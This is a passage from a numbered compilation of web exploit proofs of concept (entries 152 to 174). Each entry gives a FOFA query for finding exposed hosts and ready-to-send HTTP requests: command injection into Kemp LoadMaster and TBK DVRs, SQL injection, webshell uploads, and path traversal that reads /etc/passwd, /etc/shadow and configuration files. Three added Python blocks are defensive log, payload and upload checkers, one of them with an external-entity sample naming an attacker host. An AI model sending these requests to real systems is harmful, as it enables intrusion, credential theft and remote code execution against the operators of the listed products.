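Entries 126, 129, 132, 147 and 149 to 151 above all reach a protected handler or a file outside the web root through the request path itself: a `;` path-parameter segment (`;swagger-ui/`, `/pwned?...;.jsp`) or `..` segments, raw or percent-encoded. The block below is an added example, not code from this compilation or from any of the vendors named in it: it scans access-log lines for those patterns and reports where a `..` path actually resolves. The log lines, the combined-log regex and the list of sensitive path markers are constructed for the example.

```python
"""Flag access-log requests that reach a handler through a path trick:
';' path parameters, a '.jsp' suffix smuggled in the query string, or
'..' segments (raw or percent-encoded) that resolve somewhere else."""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in combined-log format (not captured traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 8812
10.0.0.6 - - [12/Mar/2024:10:02:00 +0000] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1907
10.0.0.7 - - [12/Mar/2024:10:02:30 +0000] "GET /;swagger-ui/dataSource/pageList?pageSize=10 HTTP/1.1" 200 301
10.0.0.8 - - [12/Mar/2024:10:03:00 +0000] "GET /webeditor/..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 403
10.0.0.9 - - [12/Mar/2024:10:04:00 +0000] "GET /static/app.js HTTP/1.1" 200 20993
10.0.0.9 - - [12/Mar/2024:10:04:01 +0000] "GET /login?next=/dashboard HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markers chosen for this example; extend them to match the applications you run.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "win.ini", "/admin/", "/web-inf/")


def analyze_target(target):
    """Classify one request target; returns {"target", "resolved", "findings"}."""
    decoded = unquote(unquote(target))  # two rounds so %252e%252e also collapses to ..
    path, _, query = decoded.partition("?")
    findings = []
    # 1. Servlet-style path parameters: "/;swagger-ui/x" is routed as "/x", but an
    #    authentication rule that string-matches the literal prefix sees "swagger-ui".
    if any(";" in segment for segment in path.split("/")):
        findings.append("path-parameter")
    # 2. A ".jsp" ending placed in the query string so that a check on the whole
    #    request URI passes while the servlet path is something else entirely.
    if query.lower().endswith(".jsp") and not path.lower().endswith(".jsp"):
        findings.append("jsp-suffix-in-query")
    # 3. Dot-dot segments: report where the path lands once normalized.
    resolved = posixpath.normpath(path)
    if ".." in path.split("/"):
        findings.append("dot-dot")
        for marker in SENSITIVE:
            if marker in resolved.lower():
                findings.append("sensitive:" + marker)
                break
    return {"target": target, "resolved": resolved, "findings": findings}


def scan_access_log(text):
    """Return the analysis of every line whose target produced a finding."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        result = analyze_target(match.group("target"))
        if result["findings"]:
            result["method"] = match.group("method")
            hits.append(result)
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["method"], hit["target"], "->", hit["resolved"], hit["findings"])
```

Run it over real logs by feeding the file contents to scan_access_log. The resolved path is the useful field for triage: a 200 response for a request that resolves to /admin/diagnostic.jsp or /etc/passwd is a confirmed hit, while a 403 or 404 shows the server normalized or rejected it.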
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), <= 7.2.54.8 (LTSF), <= 7.2.48.10 (LTS)
FOFA: body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. a Basic-auth user name of ';ls;' with an arbitrary password; the shell command is injected through the user name.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

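Entries 122, 144, 146 and 152 above each carry their payload in base64 (a query parameter or, for LoadMaster, the Basic-auth user name), so a rule that looks only at the raw request text never sees select, id or the ; around ls. The block below is an added example, not from this compilation or from the vendors: it decodes every base64-shaped query value and the Authorization header and tags decoded text that contains SQL keywords or shell metacharacters. The printable-ASCII check and the keyword lists are this example's own heuristics; the sample targets are copied from the entries above.

```python
"""Decode base64-looking request values (query parameters and the Basic
Authorization header) and flag SQL or shell metacharacters hidden inside."""
import base64
import re
from urllib.parse import parse_qsl, urlsplit

B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+=*")
PRINTABLE = re.compile(r"[\x20-\x7e\t\r\n]+")
# Keyword lists chosen for this example; tune them to the traffic you inspect.
SQL_RE = re.compile(r"\b(select|union|sleep|updatexml|extractvalue|database|version)\b|--|/\*", re.I)
SHELL_RE = re.compile(r"[;|&`$]|\b(id|ls|cat|curl|wget|nc|sh|bash)\b")


def try_base64(value):
    """Return the decoded text if value is base64 of printable ASCII, else None."""
    value = value.strip()
    if len(value) < 4 or not B64_ALPHABET.fullmatch(value):
        return None
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None
    return text if PRINTABLE.fullmatch(text) else None


def classify(text):
    """Tag decoded text with 'sql' and/or 'shell' when it carries injection markers."""
    tags = []
    if SQL_RE.search(text):
        tags.append("sql")
    if SHELL_RE.search(text):
        tags.append("shell")
    return tags


def inspect_request(target, headers):
    """Return (location, decoded_text, tags) for every base64-decodable value."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = try_base64(value)
        if decoded is not None:
            findings.append(("query:" + name, decoded, classify(decoded)))
    auth = headers.get("Authorization", "")
    if auth.startswith("Basic "):
        decoded = try_base64(auth[len("Basic "):])
        if decoded is not None:
            username = decoded.split(":", 1)[0]  # the injected command sits in the user name
            findings.append(("basic-auth-username", username, classify(username)))
    return findings


if __name__ == "__main__":
    # Request targets taken from the entries above; header from the LoadMaster request.
    samples = [
        ("/importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql", {}),
        ("/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ=", {}),
        ("/access/set?param=enableapi&value=1", {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}),
    ]
    for target, headers in samples:
        for location, decoded, tags in inspect_request(target, headers):
            print(target, location, repr(decoded), tags)
```

Values that are not base64 (the MajorDoMo transport parameter, for instance) are ignored by design; they need an ordinary plaintext rule. Short words that happen to be valid base64 alphabet (enableapi, exportexcelbysql) decode to non-printable bytes and are dropped by the printable check, which is what keeps the false-positive rate tolerable.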
153. Gradio arbitrary file read
CVE-2024-1561
FOFA: body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into its temporary cache directory
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy at the path returned in step 2
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA: body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

PostgreSQL time-based injection in the gsdwid field: a vulnerable target answers about 5 s late.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA: title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response echoes the stored path (the file is renamed); access it, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
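The upload entries above (121, 130, 133, 155; 157 below follows the same pattern) succeed because the handler trusts the client's filename or declared Content-Type, and entry 127 passes an XML document with an external entity inside a multipart text field. The block below is an added example, not code from this compilation or from any vendor: a small multipart parser plus the checks that a gateway, or the upload handler itself, should run on each part before storing anything. The boundary, the parts and the extension, magic and entity rules are constructed for the example; the PHP part mirrors entry 130.

```python
"""Inspect a multipart/form-data body before the upload handler does:
executable extensions, script source behind an image Content-Type, and
DOCTYPE/external-entity declarations in XML form fields."""
import os
import re

BOUNDARY = "----WebKitFormBoundary3OCVBiwBVsNuB2kR"

# Constructed sample body (not captured traffic): a PHP file declared as
# image/png, a genuine PNG header, an XML field with an external entity,
# and an ordinary text field.
SAMPLE_BODY = (
    b"------WebKitFormBoundary3OCVBiwBVsNuB2kR\r\n"
    b'Content-Disposition: form-data; name="file"; filename="1.php"\r\n'
    b"Content-Type: image/png\r\n"
    b"\r\n"
    b"<?php phpinfo();@eval($_POST['sec']);?>\r\n"
    b"------WebKitFormBoundary3OCVBiwBVsNuB2kR\r\n"
    b'Content-Disposition: form-data; name="avatar"; filename="me.png"\r\n'
    b"Content-Type: image/png\r\n"
    b"\r\n"
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\r\n"
    b"------WebKitFormBoundary3OCVBiwBVsNuB2kR\r\n"
    b'Content-Disposition: form-data; name="Params"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b'<?xml version="1.0"?><!DOCTYPE t [<!ENTITY x SYSTEM "http://attacker.invalid/">]><t>&x;</t>\r\n'
    b"------WebKitFormBoundary3OCVBiwBVsNuB2kR\r\n"
    b'Content-Disposition: form-data; name="id_type"\r\n'
    b"\r\n"
    b"1\r\n"
    b"------WebKitFormBoundary3OCVBiwBVsNuB2kR--\r\n"
)

EXEC_EXT = {".php", ".php5", ".phtml", ".jsp", ".jspx", ".asp", ".aspx", ".ashx", ".war"}
SCRIPT_MAGIC = (b"<?php", b"<?=", b"<%", b"<jsp:", b"<script runat=")
IMAGE_MAGIC = (b"\x89PNG", b"\xff\xd8\xff", b"GIF8")


def parse_multipart(body, boundary):
    """Split a multipart body into parts: dicts with name, filename, content_type, data."""
    delimiter = b"--" + boundary.encode("ascii")
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break                      # closing delimiter "--boundary--"
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]          # CRLF that follows the delimiter line
        head, sep, data = chunk.partition(b"\r\n\r\n")
        if not sep:
            continue                   # malformed part: no blank line after headers
        if data.endswith(b"\r\n"):
            data = data[:-2]           # CRLF that precedes the next delimiter
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        name = re.search(r'\bname="([^"]*)"', disposition)
        filename = re.search(r'\bfilename="([^"]*)"', disposition)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": filename.group(1) if filename else None,
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def inspect_parts(parts):
    """Return (label, reasons) per part; an empty reasons list means nothing suspicious."""
    verdicts = []
    for part in parts:
        reasons = []
        data = part["data"]
        if part["filename"] is not None:
            extension = os.path.splitext(part["filename"].lower())[1]
            if extension in EXEC_EXT:
                reasons.append("executable-extension")
            if data.lstrip().startswith(SCRIPT_MAGIC):
                reasons.append("script-magic")
            content_type = (part["content_type"] or "").lower()
            if content_type.startswith("image/") and not data.startswith(IMAGE_MAGIC):
                reasons.append("content-type-mismatch")
        if re.search(rb"<!DOCTYPE\b", data):
            reasons.append("doctype")
        if re.search(rb"<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b", data):
            reasons.append("external-entity")
        verdicts.append((part["filename"] or part["name"], reasons))
    return verdicts


if __name__ == "__main__":
    for label, reasons in inspect_parts(parse_multipart(SAMPLE_BODY, BOUNDARY)):
        print(label, "REJECT" if reasons else "ok", reasons)
```

The three file checks are deliberately independent: the Laykefu and LyLme requests above would be caught by all three, while a webshell renamed to .png with a fake PNG header still trips script-magic only if the PHP tag comes first, so a server-side handler should additionally generate its own filename and store uploads outside any directory the web server executes.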

156. TBK DVR-4104 / DVR-4216 operating system command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected: TBK DVR-4104, TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value URL-decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt; so the directory listing and the marker string come back in the response.

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
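Every upload request from the LyLme Spage entry (CVE-2024-34982) through entry 164 relies on the same server-side gaps: the client-supplied filename is trusted (entry 161 even carries ../../../../ inside <fileName>), the declared Content-Type (image/png, image/jpeg, application/octet-stream) is taken at face value, and the file lands under the web root with a script extension. The validator below is an added example written for this page, not code from any of the listed products; UPLOAD_ROOT and the ALLOWED table are hypothetical policy values. It performs the checks those handlers skip: no path separators or traversal, an extension allowlist, magic bytes matched against the extension rather than the header, a cheap polyglot check, and a server-generated filename.

```python
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Server-side policy: allowed extension -> acceptable leading bytes (file magic).
# The client's Content-Type header is deliberately ignored: entries 155, 163 and
# 164 all declare image/png or image/jpeg for bodies that are server-side scripts.
ALLOWED = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".pdf": [b"%PDF-"],
}

# Hypothetical storage root for this example (not a path from the article).
# In production this directory sits outside the web root or is served with
# script execution disabled.
UPLOAD_ROOT = "/var/app/uploads"


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_path: Optional[str] = None


def validate_upload(client_filename: str, data: bytes) -> UploadDecision:
    """Decide whether an uploaded part may be stored, and under which name."""
    # 1. The filename must be a bare name: no '/', no '\', no '..' (entry 161).
    base = os.path.basename(client_filename.replace("\\", "/"))
    if base != client_filename or ".." in client_filename or base in ("", ".", ".."):
        return UploadDecision(False, "path separators or traversal in filename")

    # 2. Extension allowlist on the final suffix (rejects .php, .jsp, .aspx, .ashx).
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return UploadDecision(False, f"extension {ext or '(none)'} not in allowlist")

    # 3. The bytes must match the extension; the Content-Type header is not consulted.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return UploadDecision(False, f"content does not look like {ext}")

    # 4. Cheap polyglot check: a valid image header followed by a script marker.
    #    This is a heuristic; re-encoding images is the robust fix.
    if b"<?php" in data or b"<%" in data:
        return UploadDecision(False, "server-side script marker inside file body")

    # 5. Never reuse the client name: a random server-side name with the vetted extension.
    stored = os.path.join(UPLOAD_ROOT, secrets.token_hex(16) + ext)
    return UploadDecision(True, "ok", stored)


if __name__ == "__main__":
    # Constructed inputs mirroring the shapes seen in the entries above.
    for name, body in [
        ("test.php", b"<?php phpinfo(); ?>"),
        ("../../../../dizxdell.aspx", b"x"),
        ("avatar.png", b"<?php phpinfo(); ?>"),
        ("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]:
        print(name, "->", validate_upload(name, body))
```

A server that applies these checks still has to serve the stored files from a location where the web server will not execute them; the filename and content checks only stop the webshell from being written, not from being run if it ever is.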

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
